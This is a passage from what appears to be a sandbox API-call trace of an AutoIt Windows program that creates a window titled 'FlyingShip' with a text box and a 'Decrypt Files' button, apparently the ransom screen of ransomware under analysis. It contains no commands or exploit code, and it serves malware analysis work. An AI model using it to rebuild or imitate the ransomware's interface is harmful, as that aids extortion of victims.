wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.140] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.140] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.140] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.140] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.140] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.140] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.336] GetSystemMetrics (nIndex=7) returned 3 [0248.337] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x8bf524, fWinIni=0x0 | out: pvParam=0x8bf524) returned 1 [0248.337] GetSystemMetrics (nIndex=8) returned 3 [0248.337] GetSystemMetrics (nIndex=4) returned 22 [0248.337] SetRect (in: lprc=0x8bf524, xLeft=0, yTop=0, xRight=800, yBottom=650 | out: lprc=0x8bf524) returned 1 [0248.337] AdjustWindowRectEx (in: lpRect=0x8bf524, dwStyle=0x84c00000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x8bf524) returned 1 [0248.337] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3 GUI", lpWindowName="FlyingShip", dwStyle=0x84c00000, X=318, Y=92, nWidth=806, nHeight=678, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x30150 [0248.337] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.337] NtdllDialogWndProc_W () returned 0x1 [0248.337] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.337] NtdllDialogWndProc_W () returned 0x0 [0248.338] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.338] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.338] NtdllDialogWndProc_W () returned 0x0 [0248.338] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.338] NtdllDialogWndProc_W () returned 0x0 [0248.338] SetWindowLongW (hWnd=0x30150, nIndex=-21, dwNewLong=0) returned 0 [0248.338] GetClientRect (in: hWnd=0x30150, lpRect=0x8bf524 | out: lpRect=0x8bf524) returned 1 [0248.338] GetStockObject (i=17) returned 0x18a0025 [0248.338] SendMessageW (hWnd=0x30150, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0248.338] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.338] NtdllDialogWndProc_W () returned 0x0 [0248.338] GetCursorPos (in: lpPoint=0x8bf4f0 | out: lpPoint=0x8bf4f0*(x=478, y=163)) returned 1 [0248.338] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf4f0 | out: lpPoint=0x8bf4f0) returned 1 [0248.338] GetAsyncKeyState (vKey=1) returned 0 [0248.339] GetAsyncKeyState (vKey=2) returned 0 [0248.339] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x28, lpTimerFunc=0x291256) returned 0x7fe4 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3db0 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3dc8 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d98 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d80 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52500 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd01010 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3de0 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52510 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd010d0 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e10 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e40 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d328 | out: hHeap=0xbe0000) returned 1 [0248.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe524e0 | out: hHeap=0xbe0000) returned 1 [0248.339] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d328 [0248.339] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e40 [0248.339] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe524e0 [0248.339] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e10 [0248.339] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.339] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52510 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d378 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52500 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3de0 [0248.340] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52500 | out: hHeap=0xbe0000) returned 1 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52500 [0248.340] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52500 | out: hHeap=0xbe0000) returned 1 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d80 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52500 [0248.340] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52500 | out: hHeap=0xbe0000) returned 1 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d98 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52500 [0248.340] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52500 | out: hHeap=0xbe0000) returned 1 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3dc8 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52500 [0248.340] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52500 | out: hHeap=0xbe0000) returned 1 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1c) returned 0xe3d3a0 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa0) returned 0xc271f8 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3db0 [0248.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52500 [0248.341] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3fd8 [0248.341] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52620 [0248.341] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3ff0 [0248.341] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52630 [0248.341] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52640 [0248.341] CreateWindowExW (dwExStyle=0x100, lpClassName="button", lpWindowName="Decrypt Files", dwStyle=0x50030000, X=176, Y=400, nWidth=113, nHeight=41, hWndParent=0x30150, hMenu=0x3, hInstance=0x290000, lpParam=0x0) returned 0x3014e [0248.342] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.342] NtdllDialogWndProc_W () returned 0x2 [0248.342] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.342] NtdllDialogWndProc_W () returned 0x0 [0248.342] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.342] NtdllDialogWndProc_W () returned 0x0 [0248.342] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.342] NtdllDialogWndProc_W () returned 0x0 [0248.343] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.343] NtdllDialogWndProc_W () returned 0x0 [0248.343] GetStockObject (i=17) returned 0x18a0025 [0248.343] SendMessageW (hWnd=0x3014e, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0248.343] GetClientRect (in: hWnd=0x3014e, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.343] GetWindowRect (in: hWnd=0x3014e, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.343] SetWindowLongW (hWnd=0x3014e, nIndex=-21, dwNewLong=3) returned 0 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3a0 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3de0 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d80 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d98 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3dc8 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d378 | out: hHeap=0xbe0000) returned 1 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52510 | out: hHeap=0xbe0000) returned 1 [0248.343] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d378 [0248.343] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3dc8 [0248.343] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52510 [0248.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3dc8 | out: hHeap=0xbe0000) returned 1 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3a0 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3dc8 [0248.344] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3c8 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d98 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52650 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52650 | out: hHeap=0xbe0000) returned 1 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d80 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52650 [0248.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52650 | out: hHeap=0xbe0000) returned 1 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52650 [0248.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52650 | out: hHeap=0xbe0000) returned 1 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52650 [0248.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52650 | out: hHeap=0xbe0000) returned 1 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3de0 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52650 [0248.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52650 | out: hHeap=0xbe0000) returned 1 [0248.345] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4020 [0248.345] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52650 [0248.345] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4038 [0248.345] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52660 [0248.345] GetDC (hWnd=0x0) returned 0xd010720 [0248.345] GetDeviceCaps (hdc=0xd010720, index=90) returned 96 [0248.345] ReleaseDC (hWnd=0x0, hDC=0xd010720) returned 1 [0248.345] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x850a01e1 [0248.345] SendMessageW (hWnd=0x3014e, Msg=0x30, wParam=0x850a01e1, lParam=0x1) returned 0x0 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4038 | out: hHeap=0xbe0000) returned 1 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4020 | out: hHeap=0xbe0000) returned 1 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52650 | out: hHeap=0xbe0000) returned 1 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d98 | out: hHeap=0xbe0000) returned 1 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d80 | out: hHeap=0xbe0000) returned 1 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.346] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3de0 | out: hHeap=0xbe0000) returned 1 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3c8 | out: hHeap=0xbe0000) returned 1 [0248.347] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52650 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3c8 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3de0 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d80 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d98 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2) returned 0xe52660 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa0) returned 0xd11d18 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4020 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52670 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4038 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52680 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4050 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52690 [0248.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526a0 [0248.348] CreateWindowExW (dwExStyle=0x200, lpClassName="edit", lpWindowName="", dwStyle=0x503110c4, X=16, Y=56, nWidth=768, nHeight=329, hWndParent=0x30150, hMenu=0x4, hInstance=0x290000, lpParam=0x0) returned 0x20168 [0248.355] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.356] NtdllDialogWndProc_W () returned 0x0 [0248.356] GetStockObject (i=17) returned 0x18a0025 [0248.356] SendMessageW (hWnd=0x20168, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x1 [0248.362] GetWindowTextLengthW (hWnd=0x20168) returned 0 [0248.362] SendMessageW (hWnd=0x20168, Msg=0xb1, wParam=0x0, lParam=0x0) returned 0x1 [0248.363] GetClientRect (in: hWnd=0x20168, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.363] GetWindowRect (in: hWnd=0x20168, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.363] SetWindowLongW (hWnd=0x20168, nIndex=-21, dwNewLong=4) returned 0 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3de0 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d80 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3d98 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3c8 | out: hHeap=0xbe0000) returned 1 [0248.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52650 | out: hHeap=0xbe0000) returned 1 [0248.363] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3c8 [0248.363] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d98 [0248.363] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52650 [0248.363] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3d80 [0248.363] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.363] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52660 [0248.363] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01610 [0248.363] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0248.364] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01610 | out: hHeap=0xbe0000) returned 1 [0248.364] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3f0 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe52660 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d418 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526c0 [0248.364] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526c0 | out: hHeap=0xbe0000) returned 1 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe526c0 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526d0 [0248.364] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf3de0 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d440 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526d0 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4068 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4080 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526e0 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4098 [0248.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01610 [0248.365] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526f0 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52700 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40b0 [0248.365] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40b0 | out: hHeap=0xbe0000) returned 1 [0248.365] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d490 | out: hHeap=0xbe0000) returned 1 [0248.365] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.365] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf40b0 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40c8 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf40e0 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf40f8 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4110 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4128 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4158 [0248.365] RtlAllocateHeap 